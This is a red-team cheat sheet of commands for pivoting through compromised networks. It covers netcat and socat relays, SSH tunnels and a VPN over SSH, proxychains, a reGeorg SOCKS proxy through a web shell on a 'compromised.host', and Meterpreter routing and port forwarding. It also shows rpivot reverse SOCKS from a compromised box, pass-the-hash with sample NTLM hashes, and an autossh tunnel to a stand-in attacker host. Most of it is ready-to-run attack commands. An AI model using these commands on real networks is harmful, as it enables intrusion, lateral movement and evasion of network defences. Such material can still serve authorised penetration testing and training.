Network Pivoting Techniques

Basic Pivoting Types

Type Use Case
Listen - Listen Exposed asset, may not want to connect out.
Listen - Connect Normal redirect.
Connect - Connect Can’t bind, so connect to bridge two hosts

Listen - Listen

Netcat - Pivot Host

ncat -v -l -p 8080 -c "ncat -v -l -p 9090"

Socat - Pivot Host

socat -v tcp-listen:8080 tcp-listen:9090

Remote host 1

We connect to the first side of the listen->listen trigger and send the file as input.

ncat localhost 8080 < file

Remote host 2

We connect to the second side of the listen->listen trigger and write the output to disk.

ncat localhost 9090 > newfile

Listen - Connect

Netcat - Pivot Host

ncat -l -v -p 8080 -c "ncat localhost 9090"

Socat - Pivot Host

socat -v tcp-listen:8080,reuseaddr tcp-connect:localhost:9090

Remote host 1

We connect to the listen side of the listen->connect trigger and send file as input.

ncat localhost -p 8080 < file

Remote host 2

We wait and listen for the connect from the listen->connect trigger and write the file to disk.

ncat -l -p 9090 > newfile

Connect - Connect

Netcat - Pivot Host

Remote host listeners must be bound first.

ncat localhost 8080 -c "ncat localhost 9090"

Socat - Pivot Host

Remote host listeners must be bound first.

socat -v tcp-connect:localhost:8080,reuseaddr tcp-connect:localhost:9090

Remote Host 1

We bind and listen to port 8080 and send the file as input.

ncat -l -p 8080 < file

Remote Host 2

We bind and listen to port 9090 and write the data to disk.

ncat -l -p 9090 > newfile

SSH Tunnels

Dynamic SOCKS Proxy

This can be used with proxychains to forward client traffic through the remote server.

ssh -D8080 [user]@[host]

Local Port Forwarding

This will bind to [bindaddr]:[port] on the client and forward through the SSH server to the [dsthost]:[dstport]

ssh -L [bindaddr]:[port]:[dsthost]:[dstport] [user]@[host]

Remote Port Forwarding

This will bind to [bindaddr]:[port] on the remote server and tunnel traffic through the ssh client side to [localhost]:[localport]

ssh -R [bindaddr]:[port]:[localhost]:[localport] [user]@[host]

Establish VPN over SSH The following options must be enabled on the server side.

PermitRootLogin yes
PermitTunnel yes

ssh [user]@[host] -w any:any

You can see the established tun interface by typing ifconfig -a

The interfaces and forwarding must still be configured. This assumes that we are going to forward 10.0.0.0/24 through the remote server. We are also assuming that the server’s main connection is through eth0, and both client/server stood up tun0. This may be different if you already have existing VPN connections.

Client

ip addr add 192.168.5.2/32 peer 192.168.5.1 dev tun0
# Once Server is setup, run the following to add routes
route add -net 10.0.0.0/24 gw 192.168.5.1

Server

ip addr add 192.168.5.1/32 peer 192.168.5.2 dev tun0
sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A POSTROUTING -s 192.168.5.1 -o eth0 -j MASQUERADE

Proxychains

The configuration file in /etc/proxychains.conf must be edited to point towards your SOCKS proxy. Typically this is done with an SSH or other type of tunnel. Make sure your ports match.

[ProxyList]
socks4 localhost 8080

Now, in order to run any type of network through the proxy just run it like so. Remember, you can’t run any raw socket scans through a SOCKS4 proxy. You need to setup an SSH VPN tunnel or something similar for that type of functionality.

proxychains nmap 192.168.5.6

Web Shell SOCKSProxy (reGeorg)

reGeorg is a fantastic tool for using SOCKS proxies through a compromised web server. The delivery mechanism can be aspx,asph,jsp, or php. Simply upload the desired file to the webserver.

python reGeorgSocksProxy.py -p 8080 -u http://compromised.host/shell.jsp

You are now free to use your regular tools using proxychains.

Meterpreter

Meterpreter allows you to create pivoting routes within the framework for use with any of the builtin modules. To automatically route, just use the following.

run autoroute -s 192.168.5.1/24

To print routes

run autoroute -p

Meterpreter - SOCKS Proxy

Now you can run other tools through Meterpreter using proxychains.

use auxiliary/server/socks4a
set SRVPORT 8080
run

Forward single ports

Below will forward rdesktop sessions from localhost port 3389 to the target 192.168.5.9 through Meterpreter as a tunnel.

portfwd add -L 127.0.0.1 -l 3389 -r 192.168.5.9 -p 3389

Rpivot

Rpivot is a great SOCKS proxy based pivot tool that works like SSH’s dynamic proxy -D option, but it works in the reverse order.

Server (Attacker box)

python server.py --proxy-port 1080 --server-port 9443 --server-ip 0.0.0.0

Client (Compromised box)

python client.py --server-ip <ip> --server-port 9443

The Server will now have a SOCKS proxy on port 1080 that will forward traffic through the [client].

Through corporate proxy

Rpivot also works through corporate proxies.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe --password 1q2w3e

Passing the hash

If you prefer passing the hash, then you’re also in luck.

python client.py --server-ip [server ip] --server-port 9443 --ntlm-proxy-ip [proxy ip] \
--ntlm-proxy-port 8080 --domain CORP --username jdoe \
--hashes 986D46921DDE3E58E03656362614DEFE:50C189A98FF73B39AAD3B435B51404EE

AutoSSH

AutoSSH is a tool that allows you to automatically restart SSH sessions and tunnels. The following line will open port 2222 on host attacker and tunnel it to the compromised host on port 22. You would then be able to setup a dynamic SSH SOCKS proxy and connect to localhost:2222 and be able to forward through the compromised host as normal.

autossh -M 0 -o "ServerAliveInterval 30" -o "ServerAliveCountMax 3" -L 2222:localhost:22 [evil]@[attacker]

References

  1. Red Team Pivoting Guide
  2. Proxy Chains
  3. rpivot
  4. reGeorg
  5. Metasploit
  6. Red Team Field Manual
comments powered by Disqus